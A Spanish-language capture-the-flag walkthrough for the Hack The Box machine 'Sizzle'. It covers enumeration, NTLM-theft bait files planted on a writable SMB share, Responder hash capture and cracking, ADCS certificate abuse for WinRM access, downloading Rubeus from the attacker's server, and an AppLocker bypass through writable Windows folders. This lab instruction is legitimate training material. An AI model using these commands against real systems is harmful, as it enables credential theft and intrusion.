Table of Contents
Hack The Box: Sizzle Writeup
Welcome to my detailed writeup of the insane difficulty machine “Sizzle” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
TCP Enumeration
1$ rustscan -a 10.129.208.237 --ulimit 5000 -g
210.129.208.237 -> [21,53,80,135,139,389,443,445,464,593,636,3268,3269,5986,5985,9389,47001,49664,49692,49690,49665,49666,49671,49668,49694,49697,49708,49711,49737]
1nmap -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5986,5985,9389,47001,49664,49692,49690,49665,49666,49671,49668,49694,49697,49708,49711,49737 -sCV 10.129.208.237 -oN allPorts
2Nmap scan report for 10.129.208.237
3Host is up (0.040s latency).
4
5PORT STATE SERVICE VERSION
621/tcp open ftp Microsoft ftpd
7| ftp-syst:
8|_ SYST: Windows_NT
9|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
1053/tcp open domain Simple DNS Plus
1180/tcp open http Microsoft IIS httpd 10.0
12|_http-server-header: Microsoft-IIS/10.0
13|_http-title: Site doesn't have a title (text/html).
14| http-methods:
15|_ Potentially risky methods: TRACE
16135/tcp open msrpc Microsoft Windows RPC
17139/tcp open netbios-ssn Microsoft Windows netbios-ssn
18389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
19|_ssl-date: 2024-08-30T14:17:44+00:00; +1s from scanner time.
20| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
21| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
22| Not valid before: 2021-02-11T12:59:51
23|_Not valid after: 2022-02-11T12:59:51
24443/tcp open ssl/http Microsoft IIS httpd 10.0
25|_ssl-date: 2024-08-30T14:17:44+00:00; +1s from scanner time.
26|_http-server-header: Microsoft-IIS/10.0
27| ssl-cert: Subject: commonName=sizzle.htb.local
28| Not valid before: 2018-07-03T17:58:55
29|_Not valid after: 2020-07-02T17:58:55
30| http-methods:
31|_ Potentially risky methods: TRACE
32|_http-title: Site doesn't have a title (text/html).
33| tls-alpn:
34| h2
35|_ http/1.1
36445/tcp open microsoft-ds?
37464/tcp open kpasswd5?
38593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
39636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
40|_ssl-date: 2024-08-30T14:17:44+00:00; +1s from scanner time.
41| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
42| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
43| Not valid before: 2021-02-11T12:59:51
44|_Not valid after: 2022-02-11T12:59:51
453268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
46| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
47| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
48| Not valid before: 2021-02-11T12:59:51
49|_Not valid after: 2022-02-11T12:59:51
50|_ssl-date: 2024-08-30T14:17:44+00:00; +1s from scanner time.
513269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
52| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
53| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
54| Not valid before: 2021-02-11T12:59:51
55|_Not valid after: 2022-02-11T12:59:51
56|_ssl-date: 2024-08-30T14:17:44+00:00; +1s from scanner time.
575985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
58|_http-server-header: Microsoft-HTTPAPI/2.0
59|_http-title: Not Found
605986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
61|_ssl-date: 2024-08-30T14:17:44+00:00; +1s from scanner time.
62|_http-title: Not Found
63| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
64| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
65| Not valid before: 2021-02-11T12:59:51
66|_Not valid after: 2022-02-11T12:59:51
67| tls-alpn:
68| h2
69|_ http/1.1
70|_http-server-header: Microsoft-HTTPAPI/2.0
719389/tcp open mc-nmf .NET Message Framing
7247001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
73|_http-server-header: Microsoft-HTTPAPI/2.0
74|_http-title: Not Found
7549664/tcp open msrpc Microsoft Windows RPC
7649665/tcp open msrpc Microsoft Windows RPC
7749666/tcp open msrpc Microsoft Windows RPC
7849668/tcp open msrpc Microsoft Windows RPC
7949671/tcp open msrpc Microsoft Windows RPC
8049690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
8149692/tcp open msrpc Microsoft Windows RPC
8249694/tcp open msrpc Microsoft Windows RPC
8349697/tcp open msrpc Microsoft Windows RPC
8449708/tcp open msrpc Microsoft Windows RPC
8549711/tcp open msrpc Microsoft Windows RPC
8649737/tcp open msrpc Microsoft Windows RPC
87Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
88
89Host script results:
90| smb2-security-mode:
91| 3:1:1:
92|_ Message signing enabled and required
93| smb2-time:
94| date: 2024-08-30T14:17:03
95|_ start_date: 2024-08-30T14:05:32
96
97Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
98# Nmap done at Fri Aug 30 16:17:50 2024 -- 1 IP address (1 host up) scanned in 110.25 seconds
UDP Enumeration
1$ sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.208.237 -oN allPorts.UDP
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 16:18 CEST
3Nmap scan report for 10.129.208.237
4Host is up (0.063s latency).
5Not shown: 1497 open|filtered udp ports (no-response)
6PORT STATE SERVICE
753/udp open domain
888/udp open kerberos-sec
9123/udp open ntp
10
11Nmap done: 1 IP address (1 host up) scanned in 0.93 seconds
Del escaneo inicial encontramos el dominio al que nos enfrentamos, HTB.LOCAL y probablemente el CN del DC, sizzle.HTB.LOCAL
FTP Enumeration
Podemos iniciar sesión por FTP como el usuario anonymous pero no vemos ningún recurso.
1$ ftp anonymous@10.129.208.237
2Connected to 10.129.208.237.
3220 Microsoft FTP Service
4331 Anonymous access allowed, send identity (e-mail name) as password.
5Password:
6230 User logged in.
7Remote system type is Windows_NT.
8ftp> dir
9229 Entering Extended Passive Mode (|||62269|)
10125 Data connection already open; Transfer starting.
11226 Transfer complete.
No tengo permisos de escritura.
1$ ftp anonymous@10.129.208.237
2Connected to 10.129.208.237.
3220 Microsoft FTP Service
4331 Anonymous access allowed, send identity (e-mail name) as password.
5Password:
6230 User logged in.
7Remote system type is Windows_NT.
8ftp> put test.txt
9local: test.txt remote: test.txt
10229 Entering Extended Passive Mode (|||54261|)
11550 Access is denied.
SMB Enumeration
Podemos listar recursos compartidos a nivel de red con smbmap y vemos que tenemos permisos de escritura en el recurso Department Shares.
Otra cosa curiosa que encontramos es el recurso CertEnroll, este recurso nos indica que existe un servicio ADCS detrás.
The CertEnroll component of the Keyfactor Web APIs includes all methods necessary to programmatically request and obtain a certificate.
1$ smbmap -H 10.129.208.237 -u 'null'
2[+] Guest session IP: 10.129.208.237:445 Name: 10.129.208.237
3 Disk Permissions Comment
4 ---- ----------- -------
5 ADMIN$ NO ACCESS Remote Admin
6 C$ NO ACCESS Default share
7 CertEnroll NO ACCESS Active Directory Certificate Services share
8 Department Shares READ ONLY
9 IPC$ READ ONLY Remote IPC
10 NETLOGON NO ACCESS Logon server share
11 Operations NO ACCESS
12 SYSVOL NO ACCESS Logon server share
Además a través del IIS podríamos generarnos un certificado para algún usuario. Esto lo apuntamos para mas adelante ya que nos puede servir para hacer un movimiento lateral.
Pero ahora vamos a analizar los recursos de Department Shares.
Podemos hacer esto con smbclient.
1$ smbclient "\\\\10.129.208.237\\Department Shares" -U 'null' -N
2Try "help" to get a list of possible commands.
3smb: \> dir
4 . D 0 Tue Jul 3 17:22:32 2018
5 .. D 0 Tue Jul 3 17:22:32 2018
6 Accounting D 0 Mon Jul 2 21:21:43 2018
7 Audit D 0 Mon Jul 2 21:14:28 2018
8 Banking D 0 Tue Jul 3 17:22:39 2018
9 CEO_protected D 0 Mon Jul 2 21:15:01 2018
10 Devops D 0 Mon Jul 2 21:19:33 2018
11 Finance D 0 Mon Jul 2 21:11:57 2018
12 HR D 0 Mon Jul 2 21:16:11 2018
13 Infosec D 0 Mon Jul 2 21:14:24 2018
14 Infrastructure D 0 Mon Jul 2 21:13:59 2018
15 IT D 0 Mon Jul 2 21:12:04 2018
16 Legal D 0 Mon Jul 2 21:12:09 2018
17 M&A D 0 Mon Jul 2 21:15:25 2018
18 Marketing D 0 Mon Jul 2 21:14:43 2018
19 R&D D 0 Mon Jul 2 21:11:47 2018
20 Sales D 0 Mon Jul 2 21:14:37 2018
21 Security D 0 Mon Jul 2 21:21:47 2018
22 Tax D 0 Mon Jul 2 21:16:54 2018
23 Users D 0 Tue Jul 10 23:39:32 2018
24 ZZ_ARCHIVE D 0 Mon Jul 2 21:32:58 2018
Y vemos muchísimos recursos.
Mounting SMB CIFS
Para trabajar mas cómodamente vamos a montar este fichero con mount para crear una montura de tipo CIFS y poder movernos por los directorios mas fácilmente.
Primero instalamos cifs-utils que pensaba que venía por defecto en Parrot..
1sudo apt install cifs-utils
Y ahora montamos este recurso en un directorio que había creado posteriormente en /mnt/montura
1$ sudo mount -t cifs "\\\\10.129.208.237\\Department Shares" /mnt/montura/
Ahora como podemos ver ya tenemos estos recursos en /mnt/montura.
1$ ls -la /mnt/montura
2total 24
3drwxr-xr-x 2 root root 24576 jul 3 2018 .
4drwxr-xr-x 1 root root 14 ago 30 16:27 ..
5drwxr-xr-x 2 root root 0 jul 2 2018 Accounting
6drwxr-xr-x 2 root root 0 jul 2 2018 Audit
7drwxr-xr-x 2 root root 0 jul 3 2018 Banking
8drwxr-xr-x 2 root root 0 jul 2 2018 CEO_protected
9drwxr-xr-x 2 root root 0 jul 2 2018 Devops
10drwxr-xr-x 2 root root 0 jul 2 2018 Finance
11drwxr-xr-x 2 root root 0 jul 2 2018 HR
12drwxr-xr-x 2 root root 0 jul 2 2018 Infosec
13drwxr-xr-x 2 root root 0 jul 2 2018 Infrastructure
14drwxr-xr-x 2 root root 0 jul 2 2018 IT
15drwxr-xr-x 2 root root 0 jul 2 2018 Legal
16drwxr-xr-x 2 root root 0 jul 2 2018 'M&A'
17drwxr-xr-x 2 root root 0 jul 2 2018 Marketing
18drwxr-xr-x 2 root root 0 jul 2 2018 'R&D'
19drwxr-xr-x 2 root root 0 jul 2 2018 Sales
20drwxr-xr-x 2 root root 0 jul 2 2018 Security
21drwxr-xr-x 2 root root 0 jul 2 2018 Tax
22drwxr-xr-x 2 root root 0 jul 10 2018 Users
23drwxr-xr-x 2 root root 0 jul 2 2018 ZZ_ARCHIVE
NTLM Theft -> SCF file
Vemos que el único directorio que contiene ficheros es ZZ_ARCHIVE.
1$ find . -type f
2./ZZ_ARCHIVE/AddComplete.pptx
3./ZZ_ARCHIVE/AddMerge.ram
4./ZZ_ARCHIVE/ConfirmUnprotect.doc
5./ZZ_ARCHIVE/ConvertFromInvoke.mov
6./ZZ_ARCHIVE/ConvertJoin.docx
7./ZZ_ARCHIVE/CopyPublish.ogg
8./ZZ_ARCHIVE/DebugMove.mpg
9./ZZ_ARCHIVE/DebugSelect.mpg
10./ZZ_ARCHIVE/DebugUse.pptx
11./ZZ_ARCHIVE/DisconnectApprove.ogg
12./ZZ_ARCHIVE/DisconnectDebug.mpeg2
13./ZZ_ARCHIVE/EditCompress.xls
14./ZZ_ARCHIVE/EditMount.doc
15./ZZ_ARCHIVE/EditSuspend.mp3
16./ZZ_ARCHIVE/EnableAdd.pptx
17./ZZ_ARCHIVE/EnablePing.mov
18./ZZ_ARCHIVE/EnableSend.ppt
19./ZZ_ARCHIVE/EnterMerge.mpeg
20./ZZ_ARCHIVE/ExitEnter.mpg
21./ZZ_ARCHIVE/ExportEdit.ogg
22./ZZ_ARCHIVE/GetOptimize.pdf
23./ZZ_ARCHIVE/GroupSend.rm
24./ZZ_ARCHIVE/HideExpand.rm
25./ZZ_ARCHIVE/InstallWait.pptx
26./ZZ_ARCHIVE/JoinEnable.ram
27./ZZ_ARCHIVE/LimitInstall.doc
28./ZZ_ARCHIVE/LimitStep.ppt
29./ZZ_ARCHIVE/MergeBlock.mp3
30./ZZ_ARCHIVE/MountClear.mpeg2
31./ZZ_ARCHIVE/MoveUninstall.docx
32./ZZ_ARCHIVE/NewInitialize.doc
33./ZZ_ARCHIVE/OutConnect.mpeg2
34./ZZ_ARCHIVE/PingGet.dot
35./ZZ_ARCHIVE/ReceiveInvoke.mpeg2
36./ZZ_ARCHIVE/RemoveEnter.mpeg3
37./ZZ_ARCHIVE/RemoveRestart.mpeg
38./ZZ_ARCHIVE/RequestJoin.mpeg2
39./ZZ_ARCHIVE/RequestOpen.ogg
40./ZZ_ARCHIVE/ResetCompare.avi
41./ZZ_ARCHIVE/ResetUninstall.mpeg
42./ZZ_ARCHIVE/ResumeCompare.doc
43./ZZ_ARCHIVE/SelectPop.ogg
44./ZZ_ARCHIVE/SuspendWatch.mp4
45./ZZ_ARCHIVE/SwitchConvertFrom.mpg
46./ZZ_ARCHIVE/UndoPing.rm
47./ZZ_ARCHIVE/UninstallExpand.mp3
48./ZZ_ARCHIVE/UnpublishSplit.ppt
49./ZZ_ARCHIVE/UnregisterPing.pptx
50./ZZ_ARCHIVE/UpdateRead.mpeg
51./ZZ_ARCHIVE/WaitRevoke.pptx
52./ZZ_ARCHIVE/WriteUninstall.mp3
Vemos que todos estos archivos tienen el mismo peso, algo extraño.
1$ ls -la | head -n 10
2total 21036
3drwxr-xr-x 2 root root 0 jul 2 2018 .
4drwxr-xr-x 2 root root 24576 jul 3 2018 ..
5-rwxr-xr-x 1 root root 419430 jul 2 2018 AddComplete.pptx
6-rwxr-xr-x 1 root root 419430 jul 2 2018 AddMerge.ram
7-rwxr-xr-x 1 root root 419430 jul 2 2018 ConfirmUnprotect.doc
8-rwxr-xr-x 1 root root 419430 jul 2 2018 ConvertFromInvoke.mov
9-rwxr-xr-x 1 root root 419430 jul 2 2018 ConvertJoin.docx
10-rwxr-xr-x 1 root root 419430 jul 2 2018 CopyPublish.ogg
11-rwxr-xr-x 1 root root 419430 jul 2 2018 DebugMove.mpg
Vamos a coger el fichero AddComplete.pptx por ejemplo y a ver con xxd cual es su contenido.
Y vemos que el fichero está lleno de Null Bytes.
1$ xxd AddComplete.pptx | head -n 15
200000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................
300000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
400000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
500000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................
600000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................
700000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
800000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................
900000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................
1000000080: 0000 0000 0000 0000 0000 0000 0000 0000 ................
1100000090: 0000 0000 0000 0000 0000 0000 0000 0000 ................
12000000a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
13000000b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
14000000c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
15000000d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
16000000e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
Así son todos los ficheros..
Nos encontramos nombres de usuarios en el directorio Users pero sin ningún fichero.
Como no encontré nada, quería saber en que ficheros tenía permisos de escritura.
Con un simple one-liner en bash podemos conseguir esto.
Vemos que en los directorios ZZ_ARCHIVE y Users/Public tenemos permisos de escritura.
1find . -type d -exec sh -c 'echo "test" > "$1/test.txt" 2>/dev/null && echo "Writable: $1" && rm "$1/test.txt"' sh {} \; 2>/dev/null
2Writable: ./Users/Public
3Writable: ./ZZ_ARCHIVE
Al buscar como intentar robar un hash NTLM a través de un archivo me encontré con esta publicación
Donde se habla de este repositorioel cual automatiza el generar varios archivos con los cuales podríamos robar un hash NTLM si un usuario le hace click.
Nos clonamos el repositorio en otra carpeta.
1$ git clone https://github.com/Greenwolf/ntlm_theft
2Cloning into 'ntlm_theft'...
3remote: Enumerating objects: 135, done.
4remote: Counting objects: 100% (28/28), done.
5remote: Compressing objects: 100% (25/25), done.
6remote: Total 135 (delta 13), reused 6 (delta 3), pack-reused 107 (from 1)
7Receiving objects: 100% (135/135), 2.12 MiB | 6.32 MiB/s, done.
8Resolving deltas: 100% (61/61), done.
Se necesita instalar una dependencia con pip llamada xlsxwriter , en mi caso ya la tenía instalada.
Ahora podemos generar todos estos archivos.
1$ python3 ntlm_theft.py -g all -s 10.10.14.66 -f pwn
2Created: pwn/pwn.scf (BROWSE TO FOLDER)
3Created: pwn/pwn-(url).url (BROWSE TO FOLDER)
4Created: pwn/pwn-(icon).url (BROWSE TO FOLDER)
5Created: pwn/pwn.lnk (BROWSE TO FOLDER)
6Created: pwn/pwn.rtf (OPEN)
7Created: pwn/pwn-(stylesheet).xml (OPEN)
8Created: pwn/pwn-(fulldocx).xml (OPEN)
9Created: pwn/pwn.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
10Created: pwn/pwn-(includepicture).docx (OPEN)
11Created: pwn/pwn-(remotetemplate).docx (OPEN)
12Created: pwn/pwn-(frameset).docx (OPEN)
13Created: pwn/pwn-(externalcell).xlsx (OPEN)
14Created: pwn/pwn.wax (OPEN)
15Created: pwn/pwn.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
16Created: pwn/pwn.asx (OPEN)
17Created: pwn/pwn.jnlp (OPEN)
18Created: pwn/pwn.application (DOWNLOAD AND OPEN)
19Created: pwn/pwn.pdf (OPEN AND ALLOW)
20Created: pwn/zoom-attack-instructions.txt (PASTE TO CHAT)
21Created: pwn/Autorun.inf (BROWSE TO FOLDER)
22Created: pwn/desktop.ini (BROWSE TO FOLDER)
23Generation Complete.
Y aquí los tenemos.
1$ ls
2 Autorun.inf pwn.htm 'pwn-(remotetemplate).docx'
3 desktop.ini 'pwn-(icon).url' pwn.rtf
4 pwn.application 'pwn-(includepicture).docx' pwn.scf
5 pwn.asx pwn.jnlp 'pwn-(stylesheet).xml'
6'pwn-(externalcell).xlsx' pwn.lnk 'pwn-(url).url'
7'pwn-(frameset).docx' pwn.m3u pwn.wax
8'pwn-(fulldocx).xml' pwn.pdf zoom-attack-instructions.txt
Nos podemos quedar en escucha de eventos con responder para ver si interceptamos un hash NTLMv2.
1$ sudo responder -I tun0
Ahora podemos copiar todos estos archivos en los directorios /Users/Public y en ZZ_ARCHIVE.
1┌─[root@parrot]─[/mnt/montura/Users/Public]
2└──╼ #cp /home/pointedsec/Desktop/sizzle/content/ntlm_theft/pwn/* . && cp /home/pointedsec/Desktop/sizzle/content/ntlm_theft/pwn/* ../../ZZ_ARCHIVE/.
Y conseguimos el hash NTLMv2 del usuario amanda
1[SMB] NTLMv2-SSP Client : 10.129.208.237
2[SMB] NTLMv2-SSP Username : HTB\amanda
3[SMB] NTLMv2-SSP Hash : amanda::HTB:473f6808eb82e74e:CC6A5FE38F1350BC661FE877D336A096:01010000000000008061ACBCFBFADA01EAD9DCC7BEBC45EF000000000200080054004A003800320001001E00570049004E002D0051003800420048005300380054003100320032004D0004003400570049004E002D0051003800420048005300380054003100320032004D002E0054004A00380032002E004C004F00430041004C000300140054004A00380032002E004C004F00430041004C000500140054004A00380032002E004C004F00430041004C00070008008061ACBCFBFADA0106000400020000000800300030000000000000000100000000200000B6D866B8823BD6BE8F91C9086172F651BEC219F88CD4D28C61AD8AA51857E5850A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0036003600000000000000000000000000
Cracking NTLMv2
Ahora podemos intentar crackear este hash con john.
1$ john -w=/usr/share/wordlists/rockyou.txt hash.amanda
2Using default input encoding: UTF-8
3Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
4Will run 4 OpenMP threads
5Press 'q' or Ctrl-C to abort, almost any other key for status
6Ashare1972 (amanda)
71g 0:00:00:04 DONE (2024-08-30 16:44) 0.2020g/s 2306Kp/s 2306Kc/s 2306KC/s Ashiah08..Ariel!
8Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
9Session completed.
Y conseguimos crackear este hash, la credencial de amanda es Ashare1972
Podemos comprobarlo con netexec
1$ nxc smb 10.129.208.237 -u amanda -p Ashare1972
2SMB 10.129.208.237 445 SIZZLE [*] Windows 10 / Server 2016 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
3SMB 10.129.208.237 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
Para comprobar si tiene acceso a WinRM, es decir, que el usuario pertenece al grupo Remote Management Users no puedo utilizar netexec o al menos la versión que tengo instalada en mi sistema ya que no soporta WinRM a través de HTTPS.
Podemos utilizar evil-winrm con la flag --ssl y vemos que no conseguimos conectarnos.
1$ evil-winrm -i 10.129.208.237 -u amanda -p Ashare1972 --ssl
2
3Evil-WinRM shell v3.5
4
5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
6
7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
8
9Warning: SSL enabled
10
11Info: Establishing connection to remote endpoint
12
13Error: An error of type ArgumentError happened, message is unknown type: 2916725146
14
15Error: Exiting with code 1
Ahora que tenemos credenciales podemos hacer otra ronda de enumeración a ver que encontramos.
En el SMB vemos que ahora tenemos mas directorios en los que podemos leer.
1$ nxc smb 10.129.208.237 -u amanda -p Ashare1972 --shares
2SMB 10.129.208.237 445 SIZZLE [*] Windows 10 / Server 2016 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
3SMB 10.129.208.237 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
4SMB 10.129.208.237 445 SIZZLE [*] Enumerated shares
5SMB 10.129.208.237 445 SIZZLE Share Permissions Remark
6SMB 10.129.208.237 445 SIZZLE ----- ----------- ------
7SMB 10.129.208.237 445 SIZZLE ADMIN$ Remote Admin
8SMB 10.129.208.237 445 SIZZLE C$ Default share
9SMB 10.129.208.237 445 SIZZLE CertEnroll READ Active Directory Certificate Services share
10SMB 10.129.208.237 445 SIZZLE Department Shares READ
11SMB 10.129.208.237 445 SIZZLE IPC$ READ Remote IPC
12SMB 10.129.208.237 445 SIZZLE NETLOGON READ Logon server share
13SMB 10.129.208.237 445 SIZZLE Operations
14SMB 10.129.208.237 445 SIZZLE SYSVOL READ Logon server share
Bloodhound
Vamos a enumerar con bloodhound-python a ver si encontramos un vector de ataque.
Si no podemos enumerar manualmente el servicio LDAP, SMB, o intentar generar un certificado para amanda a través del IIS. Si tenemos esa opción ya que aún no he enumerado el IIS.
1$ bloodhound-python -d htb.local -v -c All -dc sizzle.htb.local -ns 10.129.208.237 -u amanda -p Ashare1972
1$ ls
220240830165713_computers.json 20240830165713_gpos.json 20240830165713_users.json
320240830165713_containers.json 20240830165713_groups.json
420240830165713_domains.json 20240830165713_ous.json
Ahora iniciamos la base de datos neo4j que es la que utiliza bloodhound.
1$ sudo neo4j start
2Directories in use:
3home: /usr/share/neo4j
4config: /usr/share/neo4j/conf
5logs: /etc/neo4j/logs
6plugins: /usr/share/neo4j/plugins
7import: /usr/share/neo4j/import
8data: /etc/neo4j/data
9certificates: /usr/share/neo4j/certificates
10licenses: /usr/share/neo4j/licenses
11run: /var/lib/neo4j/run
12Starting Neo4j.
13Started neo4j (pid:178580). It is available at http://localhost:7474
14There may be a short delay until the server is ready.
Ahora podemos iniciar bloodhound.
1$ bloodhound &
2[1] 179113
3┌─[192.168.1.52]─[pointedsec@parrot]─[~/Desktop]
4└──╼ [★]$ disown %1
Y me di cuenta de que el usuario amanda si que pertenece al grupo Remote Management Users por lo cual probablemente necesitemos un certificado para poder obtener una consola a través de WinRM.
Detectamos que el usuario mrlky es kerberoasteable.
Y encima detectamos que este usuario tiene permiso para efectuar un DCSync sobre el dominio.
Por alguna razón no conseguimos el TGS con GetUserSPNs.
1$ impacket-GetUserSPNs -request -dc-ip 10.129.208.237 htb.local/amanda -output hashes.kerberoast
Generating amanda Certificate to connect via evil-winrm -> Foothold
Así que vamos a intentar generar un certificado a través del IIS para poder acceder mediante evil-winrm y intentar subir Rubeus para hacer el Kerberoast en local y conseguir este hash del TGS e intentar crackearlo, si lo conseguimos crackear ya solo faltaría hacer el DCSync.
Accedemos al servicio de ADCS web en la típica ruta /certsrv
Iniciamos sesión como amanda
Vamos a solicitar un certificado.
Avanzado..
Ahora necesitamos generar una clave privada y un certificado que será firmado por la CA.
==A las preguntas que nos hace openssl para generar estos archivos las podemos dejar vacías.==
1openssl req -new -newkey rsa:2048 -nodes -keyout private.key -out request.csr
Y aquí las tenemos.
1$ ls
2private.key request.csr
Podemos coger el certificado y copiarlo.
1$ cat request.csr 17:14:50 [1/9204]
2-----BEGIN CERTIFICATE REQUEST-----
3MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
4ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
5AQEBBQADggEPADCCAQoCggEBAOWy5mXPAsClFZ1rkLoNbZXxUoM5dbac1RTiDvhO
6ZPd6NKQmp+HIs98VPgyf/osRL43nR6t3TL1pG87a2BVby1Ic6hdHsYEM9n/xnFHI
7swPIwBOd7wvGNIL8WrbYPxtSKJZ9KEKv/1M2DM4rLoSiATnjfUMhmq53JH5W4V0a
8OaxJwdQRPSuF79EUX1h0rJ9FkNUASAHgC4/luMpah7rcbIuFp3S/nB1slDJy9g7p
9BVtEtznMWyHenVtIiUae60pfjoKOMxuwQlNzUKrCOlYA8Uw+iIUqC+va350Vs41Z
10dfcyH1HXNSWgPW4EoPRVXLDo1ua3t36+/tp+BjBvs13W15MCAwEAAaAAMA0GCSqG
11SIb3DQEBCwUAA4IBAQBTISY/mytwCWm0ZuVmKmf8YJuOBda97YMLLpX1BYvAlzuP
12/OdQmQDAAgkN5gQ1ZDdDi4xw12/w3h6xyAzKhq2Ha2t4pBCLvFpjMka3DqGQWAUB
13G4ByXh93bqnIKFgbSEXEz+nvI8Kqpy44QeCFniLGcGc/J2ylXH0BeUSLMAM2FwDd
14ldik6J4TAboMMWomFi5p7ml8lgexi49bk7URKYmzr9+yrf8Aso5R/Oby4qKTT+rN
15vRe8DYzn0qsN5iy7mRZRi3kwKW8ZUZyQzr9UJ8DLeHjMC1uJXD0f8KSuagUeaT6H
16gIysURvr0F91qBRIuBFxkxcX/SqzD/8JCy3HAgqC
17-----END CERTIFICATE REQUEST-----
1$ cat request.csr | xclip -sel clip
Lo pegamos y le damos a Submit
Y ya se nos genera el certificado firmado por la CA. Le damos a Download certificate para descargarlo.
Y aquí tenemos nuestro certificado.
1$ file certnew.cer
2certnew.cer: Certificate, Version=3
Y ahora podemos utilizar este certificado firmado y nuestra clave privada para poder conseguir una consola utilizando evil-winrm.
1$ evil-winrm -i 10.129.208.237 -u amanda -p Ashare1972 -c certnew.cer -k private.key --ssl
2
3Evil-WinRM shell v3.5
4
5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
6
7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
8
9Warning: SSL enabled
10
11Info: Establishing connection to remote endpoint
12*Evil-WinRM* PS C:\Users\amanda\Documents> whoami
13htb\amanda
Vemos que no está la flag de usuario.
1*Evil-WinRM* PS C:\Users\amanda\Desktop> dir
2*Evil-WinRM* PS C:\Users\amanda\Desktop>
Debe de tenerla el usuario mrlky.
Como ya tenemos el vector de ataque claro, vamos a pasarnos Rubeus a la máquina víctima.
Nos copiamos el Rubeus
1$ cp /opt/SharpCollection/NetFramework_4.7_Any/Rubeus.exe .
Por alguna razón me salta un error al intentar utilizar la función upload que tiene definida evil-winrm
Así que lo vamos a servir a través del puerto 8081.
1 python3 -m http.server 8081
2Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
Nos lo descargamos en la máquina víctima.
1*Evil-WinRM* PS C:\ProgramData> iwr http://10.10.14.66:8081/Rubeus.exe -o Rubeus.exe
Bypassing AppLocker
Vemos que se nos está bloqueando el uso de Rubeus.
1*Evil-WinRM* PS C:\ProgramData> .\Rubeus.exe
2Program 'Rubeus.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
3+ .\Rubeus.exe
4+ ~~~~~~~~~~~~.
5At line:1 char:1
6+ .\Rubeus.exe
7+ ~~~~~~~~~~~~
8 + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
9 + FullyQualifiedErrorId : NativeCommandFailed
Vemos que AppLocker por defecto tiene una regla por defecto para dejar a los ejecutables “en paz” que estén en la ruta C:\Windows\Temp
Lo leí en este post de Reddit
One common whitelist Default Rule is to allow executables to run from C:\Windows. However, some folders in C:\Windows have User read/write access! This could allow someone to run an executable and essentially bypass the Default Rule.
In my testing, I confirmed some of our servers allowed read/write access to C:\Windows\Tracing, C:\Windows\Tasks, and C:\Windows\Temp and more. Time to update some rules!
Y así de fácil nos saltamos esta protección.
